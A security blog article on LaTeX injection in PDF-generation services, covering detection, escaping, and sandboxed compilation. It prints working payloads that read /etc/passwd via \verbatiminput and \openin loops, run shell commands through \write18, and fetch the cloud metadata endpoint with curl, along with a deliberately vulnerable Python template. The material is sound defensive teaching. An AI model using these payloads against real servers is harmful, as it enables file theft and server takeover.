What is LaTeX Injection? Ways to Exploit, Examples and Impact

Discover how LaTeX injection allows attackers to read files and execute commands. Learn to secure your PDF generation tools with this technical guide.


In the world of web application security, we often focus on common vulnerabilities like SQL Injection or Cross-Site Scripting (XSS). However, as applications become more specialized, so do the attack vectors. LaTeX injection is a critical yet often overlooked vulnerability that arises when web applications use the LaTeX typesetting system to generate PDFs or images from user-supplied input. If not properly sanitized, this input can allow an attacker to read sensitive files, perform internal network requests, or even execute arbitrary commands on the server.

Understanding the Basics of LaTeX

Before diving into the injection aspect, it is essential to understand what LaTeX is. LaTeX is a high-quality typesetting system used primarily for the production of technical and scientific documentation. Unlike a standard word processor, LaTeX is a markup language. Users write plain text interspersed with commands that describe the structure and meaning of the document, which a compiler (like pdflatex or xelatex) then processes into a formatted document, usually a PDF.

Because LaTeX is incredibly powerful and extensible, it includes features for file handling, mathematical rendering, and even system-level interactions. When a web application—such as an academic paper generator, a CV builder, or a math formula renderer—takes user input and embeds it directly into a LaTeX template, it opens the door for an attacker to inject their own LaTeX commands. This is the core of a LaTeX injection attack.

How LaTeX Injection Works

LaTeX injection occurs when the boundary between data and code is blurred. A typical vulnerable workflow looks like this:

  1. A user provides input via a web form (e.g., a name for a certificate or a mathematical formula).
  2. The application inserts this input into a .tex file template.
  3. The application calls a system command like pdflatex document.tex to generate a PDF.
  4. The resulting PDF is served to the user.

If the application does not filter out special LaTeX characters (like \, {, }, or $), an attacker can break out of the intended context. For example, if the template is \textbf{USER_INPUT}, and the user provides }\textit{injected, the resulting code becomes \textbf{}\textit{injected}, changing the document's structure. While this example is cosmetic, more dangerous commands can lead to severe security breaches.
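Here is a deliberately vulnerable Python sketch of steps 2 and 3 that makes the workflow concrete. The template text and the build_tex helper are hypothetical. It shows only that plain string substitution turns user input into LaTeX code:

```python
# Deliberately VULNERABLE sketch: user input is pasted into the template as-is.
# TEMPLATE and build_tex are hypothetical names used only for illustration.
TEMPLATE = r"""\documentclass{article}
\begin{document}
Certificate awarded to \textbf{USER_INPUT}.
\end{document}
"""


def build_tex(user_input: str) -> str:
    # No escaping: whatever the user types becomes part of the LaTeX source.
    return TEMPLATE.replace("USER_INPUT", user_input)


if __name__ == "__main__":
    # The application would now write this to document.tex and run
    # `pdflatex document.tex` (step 3).
    print(build_tex(r"}\textit{injected"))
```

Running it prints a document whose body line reads Certificate awarded to \textbf{}\textit{injected}., which is the breakout described above.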

Types of LaTeX Injection Exploits

Exploitation of LaTeX injection generally falls into three categories: Information Disclosure, Server-Side Request Forgery (SSRF), and Remote Code Execution (RCE).

1. Information Disclosure (Arbitrary File Read)

This is the most common result of a successful LaTeX injection. LaTeX has built-in commands to include the contents of other files. If an attacker can inject these commands, they can force the server to include sensitive files like /etc/passwd or application configuration files directly into the generated PDF.

Example Payload:
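To read a file, an attacker might use the \input or \include commands. These often fail, however, if the file contains characters that LaTeX tries to interpret, such as # or _. The verbatim package is more robust because it prints the file exactly as stored. Note that \usepackage is only allowed in the preamble. This payload therefore works only if the injection point lies before \begin{document} or the template already loads verbatim: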

\usepackage{verbatim}
\verbatiminput{/etc/passwd}

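If the verbatim package isn't available, or the injection point is inside the document body, an attacker can fall back on TeX's \openin and \read primitives. These need no package and can loop over the file one line at a time:

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
  \read\file to\fileline
  \fileline
\repeat
\closein\file

Each line is typeset as ordinary LaTeX, so lines containing characters such as _ or # can still break compilation.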

2. Server-Side Request Forgery (SSRF)

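Payloads in this category aim to make the server send requests into its internal network, for example to cloud metadata services. Standard engines such as pdflatex have no built-in HTTP client. A genuine server-side request therefore requires the compiler to launch an external program, such as curl through \write18 (see Remote Code Execution below). The hyperref package is often cited in this context because it creates links to arbitrary URLs.

Example Payload:
Using the \url or \href commands, an attacker can point a link at internal services or cloud metadata endpoints (like AWS's 169.254.169.254):

\usepackage{hyperref}
\href{http://169.254.169.254/latest/meta-data/local-hostname}{Click here}

This payload does less than it appears to. \href only embeds a link annotation in the PDF. Neither pdflatex nor hyperref fetches the URL, so the server makes no request. The link is followed only if someone opens the PDF and clicks it, and the request then comes from their own machine. On its own, the payload mainly confirms that injected commands are being interpreted. Reaching 169.254.169.254 from the server requires command execution, for example \immediate\write18{curl http://169.254.169.254/latest/meta-data/local-hostname > meta.txt} followed by \input{meta.txt}.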

3. Remote Code Execution (RCE)

The most dangerous form of LaTeX injection involves the \write18 command, which lets LaTeX execute shell commands. By default, most modern distributions either disable this feature or restrict it to a small list of programs considered safe. If compilation runs with the --shell-escape flag, however, \write18 can run any command with the privileges of the compiler process. In practice this usually means the server is fully compromised.

Example Payload:
An attacker can use \write18 to execute any system command and redirect the output to a file, which they then read using the file disclosure techniques mentioned earlier.

\immediate\write18{id > output.txt}
\input{output.txt}

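Even without --shell-escape, the default restricted mode still lets LaTeX run the programs on the distribution's allowlist (the shell_escape_commands setting in TeX Live). A loosened allowlist can reopen a path to command execution, as can a vulnerability in an allowlisted program or in an engine such as LuaTeX. Bypasses of this kind have been reported in the past.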

Detecting LaTeX Injection

To identify if an application is vulnerable, security researchers look for entry points that lead to PDF generation. Common indicators include:

  • Form fields that accept mathematical notation in LaTeX syntax, such as those with MathJax-style previews.
  • Features that generate "Official" documents, reports, or invoices.
  • URL parameters that seem to influence the layout of a generated document.

Testing starts with simple characters to see if they cause a compilation error. If sending a single $ or \ results in a "Server Error" or a failed PDF generation, it suggests the input is being processed by a LaTeX engine without proper escaping. From there, testers attempt to close the current command and start a new one, much like testing for SQL injection.
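This probing step can be automated. The Python sketch below is hypothetical: submit stands in for whatever sends a value to the target field and reports whether a PDF came back. The probe strings are the minimal syntax-breakers described above. A harmless baseline is included so that a field that fails on everything is not mistaken for an injectable one.

```python
from typing import Callable, Dict

# Hypothetical probe set: a harmless baseline plus inputs that break LaTeX
# syntax only if they reach the compiler unescaped.
BASELINE = "hello"
BREAKING_PROBES = {
    "lone_dollar": "$",          # opens math mode that never closes
    "trailing_backslash": "\\",  # escapes the template's closing brace
    "unbalanced_brace": "}",     # closes the template's group early
}


def probe_latex_sink(submit: Callable[[str], bool]) -> Dict[str, bool]:
    """Send each probe through `submit`, a caller-supplied (hypothetical)
    function that returns True if the application produced a PDF."""
    results = {"baseline": submit(BASELINE)}
    for name, payload in BREAKING_PROBES.items():
        results[name] = submit(payload)
    return results


def looks_injectable(results: Dict[str, bool]) -> bool:
    # The baseline compiles but at least one syntax-breaking probe fails:
    # special characters are probably being interpreted, not escaped.
    return results["baseline"] and not all(results[name] for name in BREAKING_PROBES)
```

A positive result is only a lead. The next step is still to close the current command and start a new one by hand.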

Real-World Impact

The impact of LaTeX injection depends heavily on the server's configuration. In a worst-case scenario where the LaTeX engine runs with high privileges and shell escape enabled, an attacker gains full control over the web server. This allows for data exfiltration, installation of backdoors, and lateral movement within the corporate network.

Even in restricted environments, the ability to read local files is devastating. An attacker could read the application's source code, discover database credentials, or steal environment variables. These payloads can also slip past traditional Web Application Firewalls (WAFs) that are not configured to inspect for LaTeX-specific syntax, because strings like \input{/etc/passwd} match none of the usual SQL injection or XSS signatures. PDF generation also often runs as a background task, so failed or malicious compilations can go unnoticed.

Mitigation and Prevention Strategies

Securing an application against LaTeX injection requires a defense-in-depth approach. You cannot rely on a single solution; instead, you must combine multiple layers of security.

Input Sanitization and Escaping

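The first line of defense is to escape all user input before it reaches the LaTeX template. LaTeX reserves the characters below. Most are escaped by prefixing a backslash (\{, \}, \$, \%, \&, \_, \#). The backslash, tilde, and caret need text commands instead (\textbackslash{}, \textasciitilde{}, \textasciicircum{}), because \\, \~ and \^ already have other meanings: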

  • Backslash (\)
  • Curly braces ({, })
  • Dollar sign ($)
  • Percent sign (%)
  • Ampersand (&)
  • Underscore (_)
  • Hash (#)
  • Tilde (~)
  • Caret (^)

Instead of writing your own regex, use established libraries designed for LaTeX escaping. However, remember that escaping is often insufficient for complex templates, as an attacker might still find ways to use allowed commands maliciously.
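Below is a minimal Python sketch of single-pass escaping for the ten characters listed above. The escape_latex name and its mapping are illustrative, not a specific library's API, and a maintained library remains preferable in production. The mapping has to run in one pass. Escaping backslashes first and braces second would mangle the braces inside \textbackslash{}.

```python
# Illustrative mapping for LaTeX's ten reserved characters (hypothetical helper).
LATEX_ESCAPES = {
    "\\": r"\textbackslash{}",
    "{": r"\{",
    "}": r"\}",
    "$": r"\$",
    "%": r"\%",
    "&": r"\&",
    "_": r"\_",
    "#": r"\#",
    "~": r"\textasciitilde{}",
    "^": r"\textasciicircum{}",
}


def escape_latex(text: str) -> str:
    # Map each character exactly once, so backslashes introduced by the
    # replacements are never escaped a second time.
    return "".join(LATEX_ESCAPES.get(ch, ch) for ch in text)
```

With this helper, the file-read payload }\input{/etc/passwd} becomes \}\textbackslash{}input\{/etc/passwd\}, which LaTeX prints as literal text.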

Hardening the LaTeX Environment

Configuration is the most critical part of preventing RCE and SSRF.

  1. Disable Shell Escape: Ensure that the --shell-escape or --enable-write18 flags are never used. Use --no-shell-escape explicitly.
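  2. Use Restricted Mode: Where shell escape cannot be turned off completely, rely on the "restricted" mode that most modern TeX distributions (like TeX Live) enable by default. It allows only a short allowlist of programs to run.
  3. Filesystem Permissions: Run the LaTeX compiler as a low-privileged user. Use a dedicated user account that has no access to sensitive locations like /var/www, .ssh directories, or application secrets. World-readable files such as /etc/passwd remain readable to any account, so permissions limit file disclosure but do not prevent it.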
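These settings can be combined into one compile wrapper. The Python sketch below assumes TeX Live's pdflatex is on PATH. It also assumes that TeX Live's kpathsea library honours the openin_any and openout_any texmf.cnf variables when they are set in the environment. In TeX Live's configuration, the value p ("paranoid") refuses dotfiles and parent directories, and restricts absolute paths to $TEXMFOUTPUT. That setting blocks payloads such as \openin\file=/etc/passwd. The function names are hypothetical.

```python
import os
import subprocess
from pathlib import Path
from typing import Dict, List


def build_pdflatex_command(tex_file: str) -> List[str]:
    return [
        "pdflatex",
        "--no-shell-escape",          # \write18 disabled entirely, not just restricted
        "--interaction=nonstopmode",  # never wait for terminal input on errors
        "--halt-on-error",            # stop at the first error
        tex_file,
    ]


def hardened_env() -> Dict[str, str]:
    env = dict(os.environ)
    # Assumption: kpathsea reads these texmf.cnf variables from the environment.
    # "p" (paranoid) rejects dotfiles, parent directories and absolute paths
    # outside $TEXMFOUTPUT, for both reading and writing.
    env["openin_any"] = "p"
    env["openout_any"] = "p"
    return env


def compile_pdf(workdir: Path, tex_file: str = "document.tex", timeout: float = 30) -> Path:
    subprocess.run(
        build_pdflatex_command(tex_file),
        cwd=workdir,
        env=hardened_env(),
        check=True,          # raise CalledProcessError if compilation fails
        timeout=timeout,     # kill runaway jobs such as endless \loop payloads
        capture_output=True,
    )
    return workdir / (Path(tex_file).stem + ".pdf")
```

Run this as the dedicated low-privileged user from item 3, so that the flags and the file permissions reinforce each other.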

Sandboxing and Containerization

The most effective way to mitigate the impact of a successful injection is to isolate the compilation process.

  • Docker Containers: Run the PDF generation inside a short-lived Docker container. Mount only the necessary template files as read-only and use a non-root user.
  • Chroot/Jail: Use chroot or tools like nsjail or bubblewrap to create a highly restricted environment where the compiler cannot see the rest of the system's files or access the network.
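The Docker advice can be expressed as the argument list for a throwaway container. This is a Python sketch. The texlive/texlive image name, UID 65534 ("nobody" on many distributions), the HOME override, and the resource limits are assumptions to adjust. The per-job directory must also be writable by that UID. The flags themselves (--network none, --read-only, --cap-drop, --security-opt no-new-privileges, --pids-limit) are standard docker run options.

```python
from pathlib import Path
from typing import List


def docker_pdflatex_command(
    workdir: Path,
    templates_dir: Path,
    image: str = "texlive/texlive",  # assumption: pin your own vetted image
) -> List[str]:
    """Build a `docker run` argv that compiles /work/document.tex in isolation."""
    return [
        "docker", "run", "--rm",                  # throwaway container
        "--network", "none",                      # no network: no SSRF, no exfiltration
        "--read-only",                            # immutable root filesystem
        "--tmpfs", "/tmp",                        # scratch space that dies with the container
        "-e", "HOME=/tmp",                        # writable home for TeX caches (assumption)
        "--user", "65534:65534",                  # unprivileged UID/GID
        "--cap-drop", "ALL",                      # drop all Linux capabilities
        "--security-opt", "no-new-privileges",    # block setuid escalation
        "--memory", "512m",                       # illustrative resource limits
        "--pids-limit", "64",
        "-v", f"{templates_dir.resolve()}:/templates:ro",  # templates mounted read-only
        "-v", f"{workdir.resolve()}:/work",       # per-job directory for input and output
        "-w", "/work",
        image,
        "pdflatex", "--no-shell-escape", "--interaction=nonstopmode",
        "--halt-on-error", "document.tex",
    ]
```

Pass the list to subprocess.run with a timeout, as with a local compiler. Because --network none removes the container's network, the curl-style server-side requests described earlier are cut off even if shell escape were somehow enabled.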

Use Safer Alternatives

If you only need to render mathematical formulas, consider using client-side libraries like MathJax or KaTeX. These render formulas in the user's browser using JavaScript and CSS, completely removing the server-side LaTeX engine from the equation and eliminating the risk of server-side injection.

Conclusion

LaTeX injection is a sophisticated vulnerability that highlights the dangers of passing untrusted data to complex system utilities. While LaTeX is an invaluable tool for document production, its power is a double-edged sword. By understanding the mechanics of how commands like \input and \write18 can be abused, developers can implement robust sanitization and sandboxing techniques to protect their infrastructure.

As organizations continue to automate document workflows, the importance of securing these internal engines grows. Regular security audits, dependency updates, and strict input validation are essential components of a modern security posture. Monitoring your infrastructure for unusual file access patterns or unexpected outbound network connections can also help detect exploitation attempts in real-time.

To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon.